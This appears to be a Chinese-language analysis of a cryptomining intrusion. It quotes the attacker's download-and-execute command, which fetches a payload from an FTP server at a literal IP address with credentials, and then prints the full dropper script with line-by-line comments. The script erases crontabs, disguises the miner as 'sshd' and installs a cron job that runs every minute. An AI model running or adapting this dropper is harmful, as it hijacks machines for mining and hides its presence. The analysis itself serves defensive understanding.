bash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r

-rwxr-xr-x 1 1001 1001  907 Nov 20 20:58 go # shell
-rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行
-rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行

#!/bin/bash

# pool.supportxmr.com门罗币的矿池
# 所以大家应该清楚了，入侵的机器应该用来挖矿的
# 这一步是测试本机与矿池dns是否通
if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];   then
        dns="" # dns通
else
        dns="-d" # dns不通
fi

# 删除用户计划任务，并将报错信息清除
crontab -r 2>/dev/null

# 这一步不太懂
rm -rf /tmp/.lock 2>/dev/null

# 设置当前进程的名字，为了掩人耳目，起个sshd, 鱼目混珠
EXEC="sshd"

# 获取当前目录
DIR=`pwd`

# 获取参数个数
# 这个程序传了一个 -r 参数，所以$#的值是1
if [ "$#" == "0" ];	then
	ARGS=""
else
	# 遍历每一个参数
	for var in "$@"
	do
		if [ "$var" != "-f" ];	then
			ARGS="$ARGS $var" # $var不是-f, 所以ARGS被这是为-r
		fi
		if [ ! -z "$FAKEPROC" ];	then
			FAKEPROC=$((FAKEPROC+1)) # 这里不会执行，因为$FAKEPROC是空字符串
		fi
		if [ "$var" == "-h" ];	then
			FAKEPROC="1" # 这里也不会执行
		fi
		if [[ "$FAKEPROC" == "2" ]];	then
			EXEC="$var" # 这里也不会执行
		fi
		if [ ! -z "$dns" ];	then
			ARGS="$ARGS $dns" # 如果本机与矿池dns通，则这里不会执行
		fi
	done
fi

# 创建目录
mkdir -- ".$EXEC" #创建 .sshd目录
cp -f -- `uname -m` ".$EXEC"/"$EXEC" # uname -m获取系统架构，然后判断要把i686还是x86_64拷贝到.sshd目录, 并重命名为sshd
./".$EXEC"/"$EXEC" $ARGS -f -c # 执行改名后的文件
rm -rf ".$EXEC"

# 生成后续执行的脚本
echo "#!/bin/bash
cd -- $DIR
mkdir -- .$EXEC
cp -f -- `uname -m` .$EXEC/$EXEC
./.$EXEC/$EXEC $ARGS -c
rm -rf .$EXEC" > "$EXEC"
chmod +x -- "$EXEC"
# 执行脚本
./"$EXEC"

# 生成计划任务执行脚本
(echo "* * * * * `pwd`/$EXEC") | sort - | uniq - | crontab -

# 删除go脚本
rm -rf go